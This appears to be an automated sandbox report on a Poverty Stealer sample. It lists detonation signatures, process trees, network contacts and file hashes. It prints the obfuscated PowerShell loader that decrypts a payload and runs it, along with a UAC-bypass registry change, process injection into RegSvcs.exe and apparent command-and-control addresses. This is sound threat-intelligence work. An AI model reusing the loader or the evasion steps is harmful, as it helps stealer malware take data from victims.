Malware Analysis Report

2024-10-23 17:19

Sample ID: 240305-cfqkkaca57
Target: 06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.unknown
SHA256: 06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f
Tags: povertystealer evasion stealer trojan
Score: 10/10

Analysis Overview

Score: 10/10
SHA256: 06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f
Threat Level: Known bad

The file 06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.unknown was found to be: Known bad.

Malicious Activity Summary

Tags: povertystealer evasion stealer trojan

Detect Poverty Stealer Payload
Poverty Stealer
UAC bypass
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Views/modifies file attributes

Analysis: static1

Detonation Overview

Reported: 2024-03-05 02:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-03-05 02:01
Reported: 2024-03-05 02:04
Platform: win7-20240221-en
Max time kernel: 118s
Max time network: 122s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta"

Signatures

Enumerates physical storage devices

Modifies Internet Explorer settings

Tags: adware spyware

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |

Suspicious behavior: EnumeratesProcesses

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |

Suspicious use of AdjustPrivilegeToken

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = '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';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 c3e011120b6ad889373fb7fd8636d767
SHA1 452e693b2bb223ee6afda9cb2266f8f02e0135e7
SHA256 ad5164bd9309f63da8508380cf58e1f128d8786b78aac0c0fa25a5cd1b7192f9
SHA512 0edf1d610e9016b0e0c0bcce6ec2a8f74dec5fa9848b6bc61c05cf4f29df2ce6269e8667f4103cc0633a842589d5b49befe55270608b7f816e1f3f4c3dc0663b

Analysis: behavioral2

Detonation Overview

Submitted: 2024-03-05 02:01
Reported: 2024-03-05 02:04
Platform: win10v2004-20240226-en
Max time kernel: 147s
Max time network: 156s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Detect Poverty Stealer Payload

Poverty Stealer

Tags: stealer povertystealer

UAC bypass

Tags: evasion trojan

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |

Blocklisted process makes network request

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |

Downloads MZ/PE file

Checks computer location settings

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Photoshop.exe | N/A |

Suspicious use of SetThreadContext

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2336 set thread context of 4856 | N/A | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |

Suspicious use of WriteProcessMemory

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1880 wrote to memory of 4656 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1880 wrote to memory of 4656 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1880 wrote to memory of 4656 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4656 wrote to memory of 3120 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4656 wrote to memory of 3120 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4656 wrote to memory of 3120 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3120 wrote to memory of 2040 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Photoshop.exe |
| PID 3120 wrote to memory of 2040 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Photoshop.exe |
| PID 3120 wrote to memory of 2040 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Photoshop.exe |
| PID 2040 wrote to memory of 2656 | N/A | C:\Users\Admin\AppData\Roaming\Photoshop.exe | C:\Windows\system32\cmd.exe |
| PID 2040 wrote to memory of 2656 | N/A | C:\Users\Admin\AppData\Roaming\Photoshop.exe | C:\Windows\system32\cmd.exe |
| PID 2656 wrote to memory of 4188 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\mode.com |
| PID 2656 wrote to memory of 4188 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\mode.com |
| PID 2656 wrote to memory of 996 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe |
| PID 2656 wrote to memory of 996 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe |
| PID 2656 wrote to memory of 3480 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe |
| PID 2656 wrote to memory of 3480 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe |
| PID 2656 wrote to memory of 4056 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe |
| PID 2656 wrote to memory of 4056 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe |
| PID 2656 wrote to memory of 4416 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe |
| PID 2656 wrote to memory of 4416 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe |
| PID 2656 wrote to memory of 2368 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe |
| PID 2656 wrote to memory of 2368 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe |
| PID 2656 wrote to memory of 4084 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe |
| PID 2656 wrote to memory of 4084 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe |
| PID 2656 wrote to memory of 2072 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\attrib.exe |
| PID 2656 wrote to memory of 2072 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\attrib.exe |
| PID 2656 wrote to memory of 2336 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe |
| PID 2656 wrote to memory of 2336 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe |
| PID 2656 wrote to memory of 2336 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe |
| PID 2336 wrote to memory of 4856 | N/A | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 2336 wrote to memory of 4856 | N/A | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 2336 wrote to memory of 4856 | N/A | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 2336 wrote to memory of 4856 | N/A | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 2336 wrote to memory of 4856 | N/A | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |

Views/modifies file attributes

Tags: evasion

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = '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';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

C:\Users\Admin\AppData\Roaming\Photoshop.exe

"C:\Users\Admin\AppData\Roaming\Photoshop.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p125762329330388294023250819845 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "nmYIeCI7gcMH.exe"

C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe

"nmYIeCI7gcMH.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 91.92.251.35:80 | 91.92.251.35 | tcp |
| US | 8.8.8.8:53 | 35.251.92.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| NL | 52.142.223.178:80 |  | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | joxi.net | udp |
| US | 104.21.73.118:80 | joxi.net | tcp |
| US | 104.21.73.118:443 | joxi.net | tcp |
| US | 8.8.8.8:53 | 118.73.21.104.in-addr.arpa | udp |
| DE | 146.70.169.164:2227 |  | tcp |
| US | 8.8.8.8:53 | 164.169.70.146.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.193.132.51.in-addr.arpa | udp |

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbqmm3vr.5n4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Photoshop.exe

MD5 a8048bd6fc7d336d7f6e0fd6800da673
SHA1 f28db14f2884ac1db0ce53a7ec7bee572541d902
SHA256 d7414d6e34052bd4194ebf979a405af4e0d39b42b6d4d6ad31db85fd78dcc31d
SHA512 570d1ac52dcb8f6c67983a4af99fece9f47e03beba83b9b2c95ce544f5b5f40c8c7e46019f5e106b258de2affee91988053dbab9e777e1c115d3803513eea066

C:\Users\Admin\AppData\Roaming\Photoshop.exe

MD5 4fd52f2655010a63deae8d3d492f6bda
SHA1 99b1ccc13b1561e93784d860d03329cfd746f6e5
SHA256 d4a0f3946c6a6204230f05b41b5c403f1c4678afb3968a1916e45a5d5f277443
SHA512 85f205ed13bb8dead4df2eb9ce8603142d9ffc0d6758f79fbbd26172a95e466072e2298848647da1ca478328632108624b766f235b3f9d5c90274e72e22d0344

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1a9f0871e2603addb86af5e7eb66f1d4
SHA1 fe3ff665c4f6de7b189edcf95f7dc0b65a2f21ca
SHA256 246c0061674e59b29627989240600f398843059a01ae86291a21b5a798378a7f
SHA512 eddda8a5160190c2388c565b91cd9fa002e174a67810ea8a9414e6a8f72829787ff5eeaaf1026f6a4a255156ad6e755f815a16db2de61ba8e59efe0aa66cafae

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 12b875e85a885c81bc04161e9df9151a
SHA1 7d9e32a575e487611abb182b4d89b1ab4f4e7a06
SHA256 97e80e083ba83a031bb03097cd81d86708165cd7eb1c070782e6a7234de784a5
SHA512 3ba38a4024287bcaeee208a1c0158fae73a86d5581cf566309985bbd204e810eb5fd099a1816a9326c9e25bb08a2da20f2a4884978eb4e4ed8a3762c1057d0ca

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 afaebf70e6daf7bf2e07cd11f93ee4a1
SHA1 4e8b08b3e50f860955bd00d16fc1653c07b7c608
SHA256 4a9d76fb9d77efaf81616e750b928ba3955599acafb2c0fec0d7ce412db0f47b
SHA512 4db3a63f03f8816b85fdb905e2a2f08967f9f3735206f08f2cae8b8cd561e8563d2f92c188d32b94fdb6d472e07c5f41f54e26673f8a81449454225220ba397f

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

MD5 9e57c6bb6dfb456cd9907844b7afafbd
SHA1 daee76439ed4cd77192dc5c2d52b187f18e5ba99
SHA256 729dbb0bd855dc1c1cf59366f49e29cb2b6e0d1279270924d2b131d7df749eab
SHA512 3a99dae0a7c4ac47c5143dd6ada9a485cf115d3d9b172c3ba6d0847d6848e41defccd3a4eaf1b44c3ae46820c2164127b4e1ceaa5e07a8028e9b38f823a5960b

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

MD5 4ab6b1ed8f26df37c531a80147982511
SHA1 25d59710197c30eee836096dfcce139ba84f978a
SHA256 33f73488015443cc05fa02d1c0723921502de5cac3206cf9fc433472a2afb162
SHA512 a582e4cd93baf45b48aad086ffc5edab4ec899cbd029e9e740e93cf34a2aff492f14c92ed2efc0339fc4eed979311600007fca3075abda28232d9d351dd49e24

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

MD5 210ee7f34c0ff268d33d598a49eb889a
SHA1 876dea438f3f365513159630a12a2192fecd8b7f
SHA256 9d8ee7edf36676633d624774cb194a45ef8ae286cb5e9591d46c20be57a9282f
SHA512 383bb66f996b858d4ef23eed2264c4f890d47aca7b3da88587e3bb6454183f8d35e44411b08eecafe3fbb0638610cd872d1d00402dd8ff0b660102a44b53bcb1

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

MD5 763cb011f068f184a672e254d3ce3c39
SHA1 59eb148e6ad321cac5396e6a58c1528f7932befb
SHA256 d25782f4a9573c40747458b6916e9332b34a349b3011ec85dd5d11a583a87105
SHA512 530b8c0ad90b53f38cd56ffaf3766f33167c9922e55f8485ca87019275730c94dd6a84a1d9578163c45bae2743cf6981041f9ccc97ceb822f8d607f94a0c1d28

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 5f79b89dbaf23387caa818b0da7b8ea2
SHA1 3c38d94819331fd551c07048841cfe6ecbf29e18
SHA256 7abc58d9dd3dee48f88629c8dcaf12e72a337f8bf1dbce59d464ab6ed698b726
SHA512 a6381f3b0d3184ab098e9a40ca65dd1cec76cb7e0cfe13a5c2d188e4c8e6d077286c70a366ad6ffc7e7f68faa6240a730b7034fcaa00d1c1f0922e42c1edb8fc

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 47e8ed572da00474326b4cee8f85b005
SHA1 94bceabdc880c41d73d6c984a9d61c31dd29ce91
SHA256 abd52eb132c8c23669233a656f036a0e07692efd398894b724b61b66a75564af
SHA512 31da04b57f0ef1b3363a3fa4855ca576d9159d374de0d2d9defb5524e67fed740441dcc2245a246daecab6260a419c02a32770ee9be53a2ddbede9dd4848d624

C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe

MD5 53c6cf5bf9ce4922b3dc9bf9cc2374a2
SHA1 b9a0d229a47fadaaa0898d32dce3aac279ac8569
SHA256 2bb1a0a95249e3bcca1fdfc740bc91df10dc9c8cd834707a0b5a31883eb6867e
SHA512 d323cfdfc3db5c5ce70ba572c0c657def11c3b36703a029977f5c5ddfdb278dfd1eea8950686d7a566dcd550aa0c854ceb035e6e67fcb377a8fc50dc4e0cd64c
